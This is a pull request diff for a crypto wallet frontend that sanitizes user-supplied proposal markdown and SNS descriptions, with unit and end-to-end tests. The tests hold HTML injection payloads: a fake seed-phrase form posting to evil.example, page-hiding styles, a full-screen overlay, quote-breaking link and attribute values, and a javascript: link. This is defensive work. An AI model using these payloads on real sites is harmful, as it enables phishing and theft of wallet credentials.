### PR TITLE
fix(frontend): sanitize rendered markdown and sns descriptions to block html injection

### DIFF
--- a/CHANGELOG-Nns-Dapp-unreleased.md
+++ b/CHANGELOG-Nns-Dapp-unreleased.md
@@ -35,6 +35,10 @@ proposal is successful, the changes it released will be moved from this file to
 
 #### Security
 
+- A proposal summary now renders only the tags and the attributes that markdown
+  needs. Before, the summary could add page-wide styles, a form with input
+  fields, or the class names of the app, and imitate the wallet UI.
+
 #### Not Published
 
 ### Operations

--- a/CHANGELOG-Nns-Dapp-unreleased.md
+++ b/CHANGELOG-Nns-Dapp-unreleased.md
@@ -39,6 +39,8 @@ proposal is successful, the changes it released will be moved from this file to
   needs. Before, the summary could add page-wide styles, a form with input
   fields, or the class names of the app, and imitate the wallet UI.
 - The image in a proposal payload no longer adds markup of its own to the page.
+- The topic description and the proposal type description of an SNS now render
+  only safe tags.
 
 #### Not Published
 

--- a/CHANGELOG-Nns-Dapp-unreleased.md
+++ b/CHANGELOG-Nns-Dapp-unreleased.md
@@ -38,6 +38,7 @@ proposal is successful, the changes it released will be moved from this file to
 - A proposal summary now renders only the tags and the attributes that markdown
   needs. Before, the summary could add page-wide styles, a form with input
   fields, or the class names of the app, and imitate the wallet UI.
+- The image in a proposal payload no longer adds markup of its own to the page.
 
 #### Not Published
 

--- a/frontend/src/lib/components/common/TreeJsonValue.svelte
+++ b/frontend/src/lib/components/common/TreeJsonValue.svelte
@@ -2,7 +2,6 @@
   import { i18n } from "$lib/stores/i18n";
   import type { TreeJsonValueType } from "$lib/utils/json.utils";
   import { splitE8sIntoChunks, stringifyJson } from "$lib/utils/utils.js";
-  import { Html } from "@dfinity/gix-components";
 
   // To avoid having quotes around all the value types
   const formatE8s = (data: unknown): string[] =>
@@ -48,10 +47,9 @@
 </script>
 
 {#if valueType === "base64Encoding"}
-  <!-- base64 encoded image (use <Html> to sanitize the content from XSS) -->
-  <Html
-    text={`<img class="value ${valueType}" alt="${key}" src="${value}" loading="lazy" />`}
-  />
+  <!-- The key and the value come from the proposal payload. Svelte escapes an
+  attribute value, so the image tag must not be built as a string. -->
+  <img class="value {valueType}" alt={key} src={value} loading="lazy" />
 {:else if valueType === "seconds"}
   <span class="value {valueType}" {title}
     >{value}

--- a/frontend/src/lib/components/common/TreeJsonValue.svelte
+++ b/frontend/src/lib/components/common/TreeJsonValue.svelte
@@ -49,7 +49,7 @@
 {#if valueType === "base64Encoding"}
   <!-- The key and the value come from the proposal payload. Svelte escapes an
   attribute value, so the image tag must not be built as a string. -->
-  <img class="value {valueType}" alt={key} src={value} loading="lazy" />
+  <img class="value {valueType}" alt={key ?? ""} src={value} loading="lazy" />
 {:else if valueType === "seconds"}
   <span class="value {valueType}" {title}
     >{value}

--- a/frontend/src/lib/components/proposal-detail/ProposalSummary.svelte
+++ b/frontend/src/lib/components/proposal-detail/ProposalSummary.svelte
@@ -1,11 +1,34 @@
 <script lang="ts">
+  import { observeRenderedMarkdown } from "$lib/utils/html.utils";
   import { Markdown } from "@dfinity/gix-components";
-  import { nonNullish } from "@dfinity/utils";
+  import { isNullish, nonNullish } from "@dfinity/utils";
+  import { onDestroy } from "svelte";
 
   export let summary: string | undefined;
 
   let showTitle: boolean;
   $: showTitle = $$slots.title !== undefined;
+
+  // The summary comes from whoever submitted the proposal. The Markdown
+  // component keeps markup that can imitate the wallet UI, so keep only the
+  // tags and the attributes that a summary needs.
+  let container: HTMLDivElement | undefined;
+  let disconnect: (() => void) | undefined;
+
+  const observeContainer = (element: HTMLDivElement | undefined) => {
+    disconnect?.();
+    disconnect = undefined;
+
+    if (isNullish(element)) {
+      return;
+    }
+
+    disconnect = observeRenderedMarkdown(element);
+  };
+
+  $: observeContainer(container);
+
+  onDestroy(() => disconnect?.());
 </script>
 
 <div class="markdown" data-tid="proposal-summary-component">
@@ -14,7 +37,10 @@
   {/if}
 
   {#if nonNullish(summary) && summary !== ""}
-    <div class="content-cell-island__card markdown-container">
+    <div
+      class="content-cell-island__card markdown-container"
+      bind:this={container}
+    >
       <Markdown text={summary} />
     </div>
   {/if}

--- a/frontend/src/lib/components/proposal-detail/ProposalSystemInfoEntry.svelte
+++ b/frontend/src/lib/components/proposal-detail/ProposalSystemInfoEntry.svelte
@@ -1,6 +1,8 @@
 <script lang="ts">
   import { i18n } from "$lib/stores/i18n";
+  import { observeRenderedMarkdown } from "$lib/utils/html.utils";
   import { Html, KeyValuePairInfo } from "@dfinity/gix-components";
+  import { isNullish } from "@dfinity/utils";
   import TestIdWrapper from "$lib/components/common/TestIdWrapper.svelte";
 
   type Props = {
@@ -11,6 +13,21 @@
   };
 
   let { label, testId, value: valueInfo, description }: Props = $props();
+
+  // An SNS supplies the description of its topics and of its nervous system
+  // functions, so keep only the tags and the attributes that a description
+  // needs.
+  let container = $state<HTMLDivElement | undefined>(undefined);
+
+  $effect(() => {
+    const element = container;
+
+    if (isNullish(element)) {
+      return;
+    }
+
+    return observeRenderedMarkdown(element);
+  });
 </script>
 
 <KeyValuePairInfo {testId} alignIconRight>
@@ -22,7 +39,15 @@
 
   {#snippet info()}
     <TestIdWrapper testId="info">
-      <Html text={description ?? $i18n.proposal_detail.no_more_info} />
+      <div class="contents" bind:this={container}>
+        <Html text={description ?? $i18n.proposal_detail.no_more_info} />
+      </div>
     </TestIdWrapper>
   {/snippet}
 </KeyValuePairInfo>
+
+<style lang="scss">
+  .contents {
+    display: contents;
+  }
+</style>

--- a/frontend/src/lib/components/proposal-detail/ProposalSystemInfoEntry.svelte
+++ b/frontend/src/lib/components/proposal-detail/ProposalSystemInfoEntry.svelte
@@ -39,6 +39,8 @@
 
   {#snippet info()}
     <TestIdWrapper testId="info">
+      <!-- TestIdWrapper is a `display: contents` element too, but it exposes no
+      element to bind to, so the sanitizer needs this one. -->
       <div class="contents" bind:this={container}>
         <Html text={description ?? $i18n.proposal_detail.no_more_info} />
       </div>

--- a/frontend/src/lib/utils/html.utils.ts
+++ b/frontend/src/lib/utils/html.utils.ts
@@ -1,0 +1,205 @@
+import { isNullish, nonNullish } from "@dfinity/utils";
+
+/**
+ * A proposal summary is written by whoever submits the proposal. The Markdown
+ * component renders it with marked, which passes raw inline HTML through, and
+ * sanitizes the result with the default DOMPurify configuration. That default
+ * keeps `<form>`, `<input>`, `<style>` inside an element, the `style`
+ * attribute, and any `class` or `id`, so a summary can paint over the wallet
+ * UI and imitate it.
+ *
+ * The helpers below run over the rendered nodes and keep only the tags and the
+ * attributes that a proposal needs. Every list here comes from a census of the
+ * rendered output of 6399 NNS proposal summaries.
+ */
+
+// Tags that marked produces for markdown, plus the inline formatting tags that
+// carry no layout, no styling and no input.
+const ALLOWED_TAGS = new Set([
+  "a",
+  "abbr",
+  "b",
+  "blockquote",
+  "br",
+  "caption",
+  "cite",
+  "code",
+  "col",
+  "colgroup",
+  "dd",
+  "del",
+  "dfn",
+  "dl",
+  "dt",
+  "em",
+  "h1",
+  "h2",
+  "h3",
+  "h4",
+  "h5",
+  "h6",
+  "hr",
+  "i",
+  "ins",
+  "kbd",
+  "li",
+  "mark",
+  "ol",
+  "p",
+  "pre",
+  "q",
+  "s",
+  "samp",
+  "small",
+  "strong",
+  "sub",
+  "sup",
+  "table",
+  "tbody",
+  "td",
+  "tfoot",
+  "th",
+  "thead",
+  "tr",
+  "u",
+  "ul",
+  "var",
+  "wbr",
+]);
+
+// Tags whose text content is code or markup instead of prose. They are removed
+// with their subtree. Every other rejected tag is unwrapped, so its text stays
+// visible.
+const DROPPED_TAGS = new Set([
+  "head",
+  "math",
+  "noscript",
+  "script",
+  "style",
+  "svg",
+  "template",
+  "title",
+]);
+
+const SAFE_LINK_SCHEMES = ["http", "https", "mailto"];
+
+// A link without a scheme is relative, so it stays inside the dapp.
+const isSafeHref = (value: string): boolean => {
+  const scheme = value.match(/^\s*([a-zA-Z][a-zA-Z0-9+.-]*):/)?.[1];
+  return isNullish(scheme) || SAFE_LINK_SCHEMES.includes(scheme.toLowerCase());
+};
+
+const matches =
+  (pattern: RegExp) =>
+  (value: string): boolean =>
+    pattern.test(value);
+
+type AttributeGuard = (value: string) => boolean;
+
+const CELL_ATTRIBUTES: Record<string, AttributeGuard> = {
+  align: matches(/^(left|center|right|justify)$/),
+  colspan: matches(/^\d{1,3}$/),
+  rowspan: matches(/^\d{1,3}$/),
+};
+
+// Attributes kept per tag. Everything else is removed, the `style`, `class`
+// and `id` attributes included.
+const ALLOWED_ATTRIBUTES: Record<string, Record<string, AttributeGuard>> = {
+  a: {
+    href: isSafeHref,
+    // The Markdown component adds `target` and `type` when it turns a markdown
+    // image into a link.
+    target: matches(/^_blank$/),
+    title: () => true,
+    type: matches(/^[a-zA-Z0-9!#$&^_.+-]+\/[a-zA-Z0-9!#$&^_.+-]+$/),
+  },
+  // marked writes the language of a fenced code block into this class.
+  code: { class: matches(/^language-[a-zA-Z0-9+#._-]+$/) },
+  ol: { start: matches(/^\d{1,9}$/) },
+  td: CELL_ATTRIBUTES,
+  th: CELL_ATTRIBUTES,
+};
+
+// Move the children of the element up to its parent, then remove the element.
+const unwrapElement = (element: Element): void => {
+  const parent = element.parentNode;
+  if (isNullish(parent)) {
+    return;
+  }
+  while (nonNullish(element.firstChild)) {
+    parent.insertBefore(element.firstChild, element);
+  }
+  parent.removeChild(element);
+};
+
+const filterAttributes = ({
+  element,
+  tag,
+}: {
+  element: Element;
+  tag: string;
+}): void => {
+  const guards = ALLOWED_ATTRIBUTES[tag] ?? {};
+  for (const { name, value } of Array.from(element.attributes)) {
+    const guard = guards[name.toLowerCase()];
+    if (isNullish(guard) || !guard(value)) {
+      element.removeAttribute(name);
+    }
+  }
+  // A link that opens a new tab must not give that tab access to this one.
+  if (tag === "a" && element.getAttribute("target") === "_blank") {
+    element.setAttribute("rel", "noopener noreferrer");
+  }
+};
+
+/**
+ * Keep only the allowed tags and attributes inside the given element.
+ *
+ * The element itself is not touched, only its descendants. The function is
+ * idempotent, so a second call over the same tree changes nothing.
+ */
+export const sanitizeRenderedMarkdown = (root: Element): void => {
+  for (const element of Array.from(root.querySelectorAll("*"))) {
+    // An earlier iteration can already have dropped this element.
+    if (!root.contains(element)) {
+      continue;
+    }
+
+    const tag = element.tagName.toLowerCase();
+
+    if (DROPPED_TAGS.has(tag)) {
+      element.remove();
+      continue;
+    }
+
+    if (!ALLOWED_TAGS.has(tag)) {
+      unwrapElement(element);
+      continue;
+    }
+
+    filterAttributes({ element, tag });
+  }
+};
+
+/**
+ * Sanitize the element now, and again after every change to its subtree.
+ *
+ * The Markdown component fills the element asynchronously, so the caller
+ * cannot know when the content arrives. A MutationObserver callback runs at
+ * the end of the current microtask checkpoint, which is before the browser
+ * paints, so rejected markup never reaches the screen.
+ *
+ * @returns a function that stops the observer.
+ */
+export const observeRenderedMarkdown = (root: Element): (() => void) => {
+  sanitizeRenderedMarkdown(root);
+
+  const observer = new MutationObserver(() => sanitizeRenderedMarkdown(root));
+  observer.observe(root, {
+    attributes: true,
+    childList: true,
+    subtree: true,
+  });
+
+  return () => observer.disconnect();
+};

--- a/frontend/src/lib/utils/html.utils.ts
+++ b/frontend/src/lib/utils/html.utils.ts
@@ -83,6 +83,8 @@ const DROPPED_TAGS = new Set([
 
 const SAFE_LINK_SCHEMES = ["http", "https", "mailto"];
 
+const SAFE_LINK_REL = "noopener noreferrer";
+
 // A link without a scheme is relative, so it stays inside the dapp.
 const isSafeHref = (value: string): boolean => {
   const scheme = value.match(/^\s*([a-zA-Z][a-zA-Z0-9+.-]*):/)?.[1];
@@ -156,8 +158,15 @@ const filterAttributes = ({
     }
   }
   // A link that opens a new tab must not give that tab access to this one.
-  if (tag === "a" && element.getAttribute("target") === "_blank") {
-    element.setAttribute("rel", "noopener noreferrer");
+  // Write the attribute only when it differs, because setAttribute reports a
+  // mutation even when the value stays the same, and the observer below would
+  // then call this function again without end.
+  if (
+    tag === "a" &&
+    element.getAttribute("target") === "_blank" &&
+    element.getAttribute("rel") !== SAFE_LINK_REL
+  ) {
+    element.setAttribute("rel", SAFE_LINK_REL);
   }
 };
 
@@ -203,7 +212,12 @@ export const sanitizeRenderedMarkdown = (root: Element): void => {
 export const observeRenderedMarkdown = (root: Element): (() => void) => {
   sanitizeRenderedMarkdown(root);
 
-  const observer = new MutationObserver(() => sanitizeRenderedMarkdown(root));
+  const observer = new MutationObserver(() => {
+    sanitizeRenderedMarkdown(root);
+    // Drop the mutations that the call above reported, so that the observer
+    // does not run over its own work.
+    observer.takeRecords();
+  });
   observer.observe(root, {
     attributes: true,
     childList: true,

--- a/frontend/src/lib/utils/html.utils.ts
+++ b/frontend/src/lib/utils/html.utils.ts
@@ -85,9 +85,21 @@ const SAFE_LINK_SCHEMES = ["http", "https", "mailto"];
 
 const SAFE_LINK_REL = "noopener noreferrer";
 
+// The URL parser of the browser drops the whitespace and the C0 control
+// characters of a URL, so `java<TAB>script:` and a NUL before `javascript:`
+// both resolve to the `javascript` scheme. Remove those characters before the
+// scheme test, or such a value passes the test as a relative link.
+const stripUrlNoise = (value: string): string =>
+  [...value]
+    .filter((character) => {
+      const code = character.codePointAt(0) ?? 0;
+      return code > 0x20 && code !== 0x7f;
+    })
+    .join("");
+
 // A link without a scheme is relative, so it stays inside the dapp.
 const isSafeHref = (value: string): boolean => {
-  const scheme = value.match(/^\s*([a-zA-Z][a-zA-Z0-9+.-]*):/)?.[1];
+  const scheme = stripUrlNoise(value).match(/^([a-zA-Z][a-zA-Z0-9+.-]*):/)?.[1];
   return isNullish(scheme) || SAFE_LINK_SCHEMES.includes(scheme.toLowerCase());
 };
 

--- a/frontend/src/lib/utils/html.utils.ts
+++ b/frontend/src/lib/utils/html.utils.ts
@@ -96,29 +96,38 @@ const matches =
 
 type AttributeGuard = (value: string) => boolean;
 
-const CELL_ATTRIBUTES: Record<string, AttributeGuard> = {
-  align: matches(/^(left|center|right|justify)$/),
-  colspan: matches(/^\d{1,3}$/),
-  rowspan: matches(/^\d{1,3}$/),
-};
+const CELL_ATTRIBUTES = new Map<string, AttributeGuard>([
+  ["align", matches(/^(left|center|right|justify)$/)],
+  ["colspan", matches(/^\d{1,3}$/)],
+  ["rowspan", matches(/^\d{1,3}$/)],
+]);
 
 // Attributes kept per tag. Everything else is removed, the `style`, `class`
-// and `id` attributes included.
-const ALLOWED_ATTRIBUTES: Record<string, Record<string, AttributeGuard>> = {
-  a: {
-    href: isSafeHref,
-    // The Markdown component adds `target` and `type` when it turns a markdown
-    // image into a link.
-    target: matches(/^_blank$/),
-    title: () => true,
-    type: matches(/^[a-zA-Z0-9!#$&^_.+-]+\/[a-zA-Z0-9!#$&^_.+-]+$/),
-  },
+// and `id` attributes included. These are Maps and not objects, so that an
+// attribute named after a property of Object.prototype finds no guard.
+const ALLOWED_ATTRIBUTES = new Map<string, Map<string, AttributeGuard>>([
+  [
+    "a",
+    new Map<string, AttributeGuard>([
+      ["href", isSafeHref],
+      // The Markdown component adds `target` and `type` when it turns a
+      // markdown image into a link.
+      ["target", matches(/^_blank$/)],
+      ["title", () => true],
+      ["type", matches(/^[a-zA-Z0-9!#$&^_.+-]+\/[a-zA-Z0-9!#$&^_.+-]+$/)],
+    ]),
+  ],
   // marked writes the language of a fenced code block into this class.
-  code: { class: matches(/^language-[a-zA-Z0-9+#._-]+$/) },
-  ol: { start: matches(/^\d{1,9}$/) },
-  td: CELL_ATTRIBUTES,
-  th: CELL_ATTRIBUTES,
-};
+  [
+    "code",
+    new Map<string, AttributeGuard>([
+      ["class", matches(/^language-[a-zA-Z0-9+#._-]+$/)],
+    ]),
+  ],
+  ["ol", new Map<string, AttributeGuard>([["start", matches(/^\d{1,9}$/)]])],
+  ["td", CELL_ATTRIBUTES],
+  ["th", CELL_ATTRIBUTES],
+]);
 
 // Move the children of the element up to its parent, then remove the element.
 const unwrapElement = (element: Element): void => {
@@ -139,9 +148,9 @@ const filterAttributes = ({
   element: Element;
   tag: string;
 }): void => {
-  const guards = ALLOWED_ATTRIBUTES[tag] ?? {};
+  const guards = ALLOWED_ATTRIBUTES.get(tag);
   for (const { name, value } of Array.from(element.attributes)) {
-    const guard = guards[name.toLowerCase()];
+    const guard = guards?.get(name.toLowerCase());
     if (isNullish(guard) || !guard(value)) {
       element.removeAttribute(name);
     }

--- a/frontend/src/tests/e2e/proposal-summary-injection.spec.ts
+++ b/frontend/src/tests/e2e/proposal-summary-injection.spec.ts
@@ -1,0 +1,164 @@
+import { AppPo } from "$tests/page-objects/App.page-object";
+import { PlaywrightPageObjectElement } from "$tests/page-objects/playwright.page-object";
+import { createDummyProposal } from "$tests/utils/e2e.nns-proposals.test-utils";
+import {
+  disableCssAnimations,
+  signInWithNewUser,
+  step,
+} from "$tests/utils/e2e.test-utils";
+import { ProposalStatus, Topic } from "@icp-sdk/canisters/nns";
+import { expect, test } from "@playwright/test";
+
+// Whoever submits a proposal writes its summary. The summary is rendered as
+// markdown, and markdown keeps raw HTML. This test submits a real proposal
+// whose summary carries markup, then reads the rendered page.
+//
+// The last line of the summary marks the end of the rendering, so the test
+// knows when the Markdown component is done.
+const MARKER = "end of the injected summary";
+
+const INJECTED_SUMMARY = `# Injection test
+
+Some **bold** text and a [link](https://internetcomputer.org/).
+
+<div><style>body { display: none !important; }</style></div>
+
+<p style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:#ffffff;z-index:99999">Fake overlay</p>
+
+<form action="https://evil.example/"><label>Seed phrase</label><input name="injected-seed"><button>Claim</button></form>
+
+<div class="content-cell-island" id="injected-id" data-tid="injected-tid"><p class="value">Balance: 0 ICP</p></div>
+
+[click](https://a.example"><form><input name="injected-href-seed"></form>)
+
+${MARKER}
+`;
+
+// The app loads this script to create the dummy proposals of a testnet. The
+// test serves its own version, so that one proposal carries the summary above.
+// See frontend/src/lib/api/dev.api.ts and
+// frontend/static/assets/libs/dummy-proposals.utils.js.
+const DUMMY_PROPOSALS_SCRIPT_PATH = "**/assets/libs/dummy-proposals.utils.js";
+
+const dummyProposalsModule = `
+export const makeDummyProposals = async ({ neuronId, canister }) => {
+  await canister.makeProposal({
+    neuronId,
+    title: "Test proposal title - markup in the summary",
+    url: "https://forum.dfinity.org/t/announcing-juno-build-on-the-ic-using-frontend-code-only",
+    summary: ${JSON.stringify(INJECTED_SUMMARY)},
+    action: {
+      Motion: {
+        motionText: "A motion whose summary carries markup.",
+      },
+    },
+  });
+};
+`;
+
+test("Test a proposal summary that carries markup", async ({
+  page,
+  context,
+}) => {
+  step("Serve a dummy proposal whose summary carries markup");
+  await page.route(DUMMY_PROPOSALS_SCRIPT_PATH, (route) =>
+    route.fulfill({
+      status: 200,
+      contentType: "application/javascript",
+      body: dummyProposalsModule,
+    })
+  );
+
+  await page.goto("/");
+  await disableCssAnimations(page);
+  await expect(page).toHaveTitle("Portfolio | Network Nervous System");
+
+  await signInWithNewUser({ page, context });
+
+  const pageElement = PlaywrightPageObjectElement.fromPage(page);
+  const appPo = new AppPo(pageElement);
+
+  step("Get some ICP");
+  await appPo.getIcpTokens(21);
+
+  step("Stake a neuron for voting");
+  await appPo.goToStaking();
+  await appPo
+    .getStakingPo()
+    .stakeFirstNnsNeuron({ amount: 10, dissolveDelayDays: "max" });
+
+  step("Create the proposal");
+  const proposerNeuronId = await createDummyProposal(appPo);
+
+  step("Open the Internet Computer proposals");
+  await appPo.goToProposals();
+  await appPo.openUniverses();
+  await appPo.getSelectUniverseListPo().clickOnInternetComputer();
+  const nnsProposalListPo = appPo.getProposalsPo().getNnsProposalListPo();
+  await nnsProposalListPo.waitForContentLoaded();
+
+  await appPo
+    .getProposalsPo()
+    .getNnsProposalFiltersPo()
+    .getActionableProposalsSegmentPo()
+    .clickAllProposals();
+
+  step("Filter the open Governance proposals");
+  await appPo
+    .getProposalsPo()
+    .getNnsProposalFiltersPo()
+    .selectTopicFilter([Topic.Governance]);
+  await nnsProposalListPo.waitForContentLoaded();
+  await appPo
+    .getProposalsPo()
+    .getNnsProposalFiltersPo()
+    .selectStatusFilter([ProposalStatus.Open]);
+  await nnsProposalListPo.waitForContentLoaded();
+
+  step("Open the proposal");
+  const proposalCard =
+    await nnsProposalListPo.getFirstProposalCardPoForProposer(proposerNeuronId);
+  await proposalCard.click();
+  await appPo.getProposalDetailPo().getNnsProposalPo().waitForContentLoaded();
+
+  step("Wait for the summary");
+  const summary = page.locator(
+    "[data-tid=proposal-summary-component] .markdown-container"
+  );
+  await expect(summary).toContainText(MARKER);
+
+  step("Check that the markdown still renders");
+  await expect(summary.locator("h1")).toHaveText("Injection test");
+  await expect(summary.locator("strong")).toHaveText("bold");
+  const link = summary.locator('a[href="https://internetcomputer.org/"]');
+  await expect(link).toHaveText("link");
+
+  step("Check that the injected markup is gone");
+  expect(await summary.locator("style").count()).toBe(0);
+  expect(await summary.locator("[style]").count()).toBe(0);
+  expect(await summary.locator("form").count()).toBe(0);
+  expect(await summary.locator("input").count()).toBe(0);
+  expect(await summary.locator("button").count()).toBe(0);
+  expect(await summary.locator("[id]").count()).toBe(0);
+  expect(await summary.locator("[data-tid]").count()).toBe(0);
+  // The summary holds no fenced code block, so no class survives at all.
+  expect(await summary.locator("[class]").count()).toBe(0);
+
+  step("Check that the injected text stays visible");
+  // A rejected tag is unwrapped, so the reader still sees its text.
+  await expect(summary).toContainText("Fake overlay");
+  await expect(summary).toContainText("Balance: 0 ICP");
+
+  step("Check that the page is not hidden");
+  const bodyDisplay = await page.evaluate(
+    () => getComputedStyle(document.body).display
+  );
+  expect(bodyDisplay).not.toBe("none");
+  await expect(page.locator("[data-tid=nns-proposal-component]")).toBeVisible();
+
+  step("Check that a new tab gets no access to the app");
+  const targetLinks = await summary.locator('a[target="_blank"]').all();
+  for (const targetLink of targetLinks) {
+    expect(await targetLink.getAttribute("rel")).toBe("noopener noreferrer");
+  }
+});

--- a/frontend/src/tests/lib/components/common/TreeJsonValue.spec.ts
+++ b/frontend/src/tests/lib/components/common/TreeJsonValue.spec.ts
@@ -1,0 +1,57 @@
+import TreeJsonValue from "$lib/components/common/TreeJsonValue.svelte";
+import { render } from "@testing-library/svelte";
+
+// A base64 encoded image comes from the proposal payload, for example the logo
+// of a CreateServiceNervousSystem proposal. Both the key and the value are
+// written by whoever submits the proposal.
+describe("TreeJsonValue", () => {
+  const renderBase64 = ({
+    key,
+    base64Encoding,
+  }: {
+    key: string;
+    base64Encoding: string;
+  }): HTMLElement => {
+    const { container } = render(TreeJsonValue, {
+      props: { valueType: "base64Encoding", key, data: { base64Encoding } },
+    });
+    return container;
+  };
+
+  it("should render the image", () => {
+    const container = renderBase64({
+      key: "logo",
+      base64Encoding: "data:image/png;base64,iVBORw0KGgo=",
+    });
+
+    const image = container.querySelector("img");
+    expect(image.getAttribute("src")).toBe(
+      "data:image/png;base64,iVBORw0KGgo="
+    );
+    expect(image.getAttribute("alt")).toBe("logo");
+    expect(image.getAttribute("loading")).toBe("lazy");
+    expect(image.className).toContain("base64Encoding");
+  });
+
+  it("should not render markup injected through the value", () => {
+    const container = renderBase64({
+      key: "logo",
+      base64Encoding:
+        'x"><form action="https://evil.example/"><input name="seed"></form><img src="x',
+    });
+
+    expect(container.querySelectorAll("form").length).toBe(0);
+    expect(container.querySelectorAll("input").length).toBe(0);
+    expect(container.querySelectorAll("img").length).toBe(1);
+  });
+
+  it("should not render markup injected through the key", () => {
+    const container = renderBase64({
+      key: 'x"><style>body{display:none}</style><img alt="',
+      base64Encoding: "data:image/png;base64,iVBORw0KGgo=",
+    });
+
+    expect(container.querySelectorAll("style").length).toBe(0);
+    expect(container.querySelectorAll("img").length).toBe(1);
+  });
+});

--- a/frontend/src/tests/lib/components/proposal-detail/ProposalSummary.spec.ts
+++ b/frontend/src/tests/lib/components/proposal-detail/ProposalSummary.spec.ts
@@ -1,0 +1,134 @@
+import ProposalSummary from "$lib/components/proposal-detail/ProposalSummary.svelte";
+import { waitFor } from "@testing-library/dom";
+import { render } from "@testing-library/svelte";
+
+// The summary of a proposal comes from whoever submitted it. These tests check
+// that the rendered summary cannot imitate the wallet UI.
+describe("ProposalSummary", () => {
+  // The Markdown component renders asynchronously. Every summary ends with
+  // this marker, so a test knows when the rendering is complete.
+  const marker = "end of the summary";
+
+  const renderSummary = async (summary: string): Promise<HTMLElement> => {
+    const { container } = render(ProposalSummary, {
+      props: { summary: `${summary}\n\n${marker}` },
+    });
+
+    const element = container.querySelector<HTMLElement>(".markdown-container");
+    expect(element).not.toBeNull();
+
+    await waitFor(() => expect(element.textContent).toContain(marker));
+
+    return element;
+  };
+
+  it("should render markdown", async () => {
+    const element = await renderSummary(
+      "# Title\n\nSome **bold** text and a [link](https://internetcomputer.org/)."
+    );
+
+    expect(element.querySelector("h1").textContent).toBe("Title");
+    expect(element.querySelector("strong").textContent).toBe("bold");
+    expect(element.querySelector("a").getAttribute("href")).toBe(
+      "https://internetcomputer.org/"
+    );
+  });
+
+  it("should render a table with its cell attributes", async () => {
+    const element = await renderSummary("| a | b |\n| :-: | - |\n| 1 | 2 |");
+
+    expect(element.querySelectorAll("table").length).toBe(1);
+    expect(element.querySelector("th").getAttribute("align")).toBe("center");
+  });
+
+  it("should not render a style element", async () => {
+    const element = await renderSummary(
+      "<div><style>body { display: none; }</style></div>\n\nSummary text"
+    );
+
+    expect(element.querySelectorAll("style").length).toBe(0);
+    expect(element.textContent).toContain("Summary text");
+    expect(element.textContent).not.toContain("display: none");
+  });
+
+  it("should not render a style attribute", async () => {
+    const element = await renderSummary(
+      '<p style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:#fff">Pay here</p>'
+    );
+
+    expect(element.querySelectorAll("[style]").length).toBe(0);
+  });
+
+  it("should not render a form", async () => {
+    const element = await renderSummary(
+      '<form action="https://evil.example/"><label>Seed phrase</label><input name="seed"><button>Claim</button></form>'
+    );
+
+    expect(element.querySelectorAll("form").length).toBe(0);
+    expect(element.querySelectorAll("input").length).toBe(0);
+    expect(element.querySelectorAll("button").length).toBe(0);
+  });
+
+  it("should not render an svg", async () => {
+    const element = await renderSummary(
+      '<svg width="100" height="100"><rect width="100" height="100" fill="red" /></svg>'
+    );
+
+    expect(element.querySelectorAll("svg").length).toBe(0);
+    expect(element.querySelectorAll("rect").length).toBe(0);
+  });
+
+  it("should not render an image with a data url", async () => {
+    const element = await renderSummary(
+      '<img src="data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=" alt="logo">'
+    );
+
+    expect(element.querySelectorAll("img").length).toBe(0);
+    expect(element.querySelectorAll("[src]").length).toBe(0);
+  });
+
+  it("should not render a markdown image with a data url as a link", async () => {
+    const element = await renderSummary(
+      "![logo](data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=)"
+    );
+
+    expect(element.querySelectorAll("img").length).toBe(0);
+    expect(element.querySelectorAll("a[href]").length).toBe(0);
+  });
+
+  it("should not render markup injected through a link destination", async () => {
+    // The Markdown component writes the destination into the href attribute
+    // without escaping the quote, so the destination can close the attribute.
+    const element = await renderSummary(
+      '[click](https://a.example"><form><input name="seed"></form>)'
+    );
+
+    expect(element.querySelectorAll("form").length).toBe(0);
+    expect(element.querySelectorAll("input").length).toBe(0);
+  });
+
+  it("should not render the classes of the app", async () => {
+    const element = await renderSummary(
+      '<div class="content-cell-island" data-tid="proposal-summary-component"><p class="value" id="fake">Balance: 0 ICP</p></div>'
+    );
+
+    expect(element.querySelectorAll("[class]").length).toBe(0);
+    expect(element.querySelectorAll("[id]").length).toBe(0);
+    expect(element.querySelectorAll("[data-tid]").length).toBe(0);
+    expect(element.textContent).toContain("Balance: 0 ICP");
+  });
+
+  it("should not render a link with an unsafe scheme", async () => {
+    const element = await renderSummary("[click](javascript:alert(1))");
+
+    expect(element.querySelectorAll("a[href]").length).toBe(0);
+  });
+
+  it("should give a new tab no access to the app", async () => {
+    const element = await renderSummary("[click](https://evil.example/)");
+
+    const link = element.querySelector("a");
+    expect(link.getAttribute("target")).toBe("_blank");
+    expect(link.getAttribute("rel")).toBe("noopener noreferrer");
+  });
+});

--- a/frontend/src/tests/lib/components/proposal-detail/ProposalSystemInfoEntry.spec.ts
+++ b/frontend/src/tests/lib/components/proposal-detail/ProposalSystemInfoEntry.spec.ts
@@ -1,0 +1,86 @@
+import ProposalSystemInfoEntry from "$lib/components/proposal-detail/ProposalSystemInfoEntry.svelte";
+import { waitFor } from "@testing-library/dom";
+import { render } from "@testing-library/svelte";
+
+// An SNS supplies the description of its topics and of its nervous system
+// functions. Whoever submits an SNS proposal writes that text.
+describe("ProposalSystemInfoEntry", () => {
+  const renderEntry = async (description: string): Promise<HTMLElement> => {
+    const { container } = render(ProposalSystemInfoEntry, {
+      props: {
+        label: "Topic",
+        testId: "proposal-system-info-topic",
+        value: "Governance",
+        description,
+      },
+    });
+
+    const element = container.querySelector<HTMLElement>('[data-tid="info"]');
+    expect(element).not.toBeNull();
+
+    // The Html component renders after the mount.
+    await waitFor(() => expect(element.textContent).not.toBe(""));
+
+    return element;
+  };
+
+  it("should render the description", async () => {
+    const element = await renderEntry(
+      'Proposals that <strong>change</strong> the <a href="https://internetcomputer.org/" target="_blank">rules</a>.'
+    );
+
+    expect(element.textContent).toContain("Proposals that change the rules.");
+    expect(element.querySelector("strong").textContent).toBe("change");
+    expect(element.querySelector("a").getAttribute("href")).toBe(
+      "https://internetcomputer.org/"
+    );
+    expect(element.querySelector("a").getAttribute("rel")).toBe(
+      "noopener noreferrer"
+    );
+  });
+
+  it("should not render a style element or a style attribute", async () => {
+    const element = await renderEntry(
+      '<div><style>body{display:none}</style></div><p style="position:fixed;inset:0">Topic</p>'
+    );
+
+    expect(element.querySelectorAll("style").length).toBe(0);
+    expect(element.querySelectorAll("[style]").length).toBe(0);
+    expect(element.textContent).toContain("Topic");
+  });
+
+  it("should not render a form", async () => {
